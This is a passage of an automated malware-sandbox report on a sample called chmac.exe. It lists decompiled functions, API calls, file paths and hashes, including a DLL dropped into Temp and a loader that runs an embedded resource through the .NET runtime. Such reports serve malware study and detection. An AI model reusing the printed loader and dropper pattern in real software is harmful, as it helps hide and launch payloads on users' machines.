GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-501415292
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00403897, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F

Strings

1033, xrefs: 0040389B, 004038A5, 00403916
C:\Users\user\AppData\Local\Temp\, xrefs: 00403898

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-1075807775
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

APIs

IsWindowVisible.USER32 ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll
API String ID: 427699356-2478815680
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming\dihsw,00402CC7,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming\dihsw,00402CC7,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\AppData\Roaming\dihsw, xrefs: 004055BF

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Roaming\dihsw
API String ID: 2709904686-3661263113
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chmac.exe PID: 6820 Parent PID: 6760 chmac.exeCOMMON

Executed Functions

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02573850, Relevance: .8, Instructions: 755COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b331c9340c9a669235c11f6317595dd5e05b185b40e5a40782f479d0d73b39ac
Instruction ID: 3692c2c59d736d3eea6c2aab1b32d720f5488ae61f433b4b05c62e2c8eadd3b5
Opcode Fuzzy Hash: b331c9340c9a669235c11f6317595dd5e05b185b40e5a40782f479d0d73b39ac
Instruction Fuzzy Hash: B1521471A04116DFCB01CF68D9849AEBFB2FF85320B1985EAD8099F252C731EC42DB94

Uniqueness

Uniqueness Score: -1.00%

Function 025723A0, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a085ba684f1d2a4ac553fe35f072cef6a43e4fc86fb3952866cdc064b19d10
Instruction ID: a5ea9b9076c00a2de942ac6459a060a04c9eb2168183c8ba353ecddecec511fe
Opcode Fuzzy Hash: 72a085ba684f1d2a4ac553fe35f072cef6a43e4fc86fb3952866cdc064b19d10
Instruction Fuzzy Hash: F412DD70E00215CFDB24DF79E9946AEBBF2BF88304F148569D806EB255DBB48846CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02572FA8, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a8c3c339084f10e2dddb024059580e05c342b954205551a0926e6fef145be9
Instruction ID: 67b6d4186549a0e5fb931cb9614308ce27e8b00b8359f9f7c42981b62528e612
Opcode Fuzzy Hash: 38a8c3c339084f10e2dddb024059580e05c342b954205551a0926e6fef145be9
Instruction Fuzzy Hash: 97818D31F01515ABC704DB69E994A6EBBF3AFC8320F2A80A4E415EB365DE35DC019B94

Uniqueness

Uniqueness Score: -1.00%

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000010.00000001.341979974.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000001.342024233.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_1_400000_chmac.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 025709A0, Relevance: 5.2, Strings: 4, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X1q, xrefs: 02570A98
X1q, xrefs: 02570A5A
X1q, xrefs: 02570A50
X1q, xrefs: 02570AA2

Memory Dump Source

Source File: 00000010.00000002.359472930.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2570000_chmac.jbxd

Similarity

API ID:
String ID: X1q$X1q$X1q$X1q
API String ID: 0-1201878573
Opcode ID: 36239273bdaa39c4c941570e5b5edd977a840b55a8e1a36a7cd9ef34aabb5db9
Instruction ID: 1c8bd29e05c996ad240f4a6c472db8e1d307233b8009ee9a5a11ada9ec579c3b
Opcode Fuzzy Hash: 36239273bdaa39c4c941570e5b5edd977a840b55a8e1a36a7cd9ef34aabb5db9
Instruction Fuzzy Hash: DA51B331B44155DFCB04DBA4E854ABEBBF2FF44304F1085A5E44A9F291DB71AE06CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
